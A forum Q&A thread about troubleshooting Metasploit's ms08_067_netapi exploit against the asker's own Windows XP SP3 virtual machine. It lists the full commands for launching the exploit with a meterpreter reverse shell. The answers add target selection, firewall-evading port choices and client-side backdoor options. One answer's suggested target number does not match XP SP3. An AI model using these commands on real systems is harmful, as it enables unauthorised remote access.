# Metasploit error, stops at attempting to trigget vulnerability for ms08_067_netapi exploit

Tags: windows-xp, linux-mint, windows-xp-sp3, metasploit

I am trying to hack my own webcam. My host PC is Linux Mint 17. The target is VM instance of Windows XP SP3.
Target IP - 192.168.1.6
My Host IP - 192.168.1.8

Problem is when i execute exploit, it says attempting to trigget the vulnerability and nothing happens.
Attached is the snapshot: Img link https://i.stack.imgur.com/EiPlr.png

Here are the commands i am using:

```
use exploit/windows/smb/ms08_067_netapi    
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.6
set LHOST 192.168.1.8
exploit
```

[image]

Answer (score 0):

Looks like you want to open a metertpreter session. Assuming this, here is one suggestion.....

Try to issue "show targets" commands and set your O.S as target, explicitly.
eg:show targets
   output might be something like....
   Exploit targets:

Id  Name

---

0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   5   Windows 2003 SP0 Universal
   6   Windows 2003 SP1 English (NO NX)
   7   Windows 2003 SP1 English (NX)
   8   Windows 2003 SP2 English (NO NX)
   9   Windows 2003 SP2 English (NX)
   10  Windows XP SP2 Arabic (NX)
   11  Windows XP SP2 Chinese - Traditional / Taiwan (NX) 
 then issue command as....

set target 8

Then issue "exploit" command.

Then check if meterpreter console opens.

Answer (score 0):

in most of the time windows targets are patched and you can not attack them with this exploit. but you can use some client side exploit like:
browse base exploit
backdoor executable
and ...

Answer (score 0):

You might try different LPORT. Try using LPORT 80 which usually works. If it does not try LPORT 443. This may be because of Outbound firewall rules.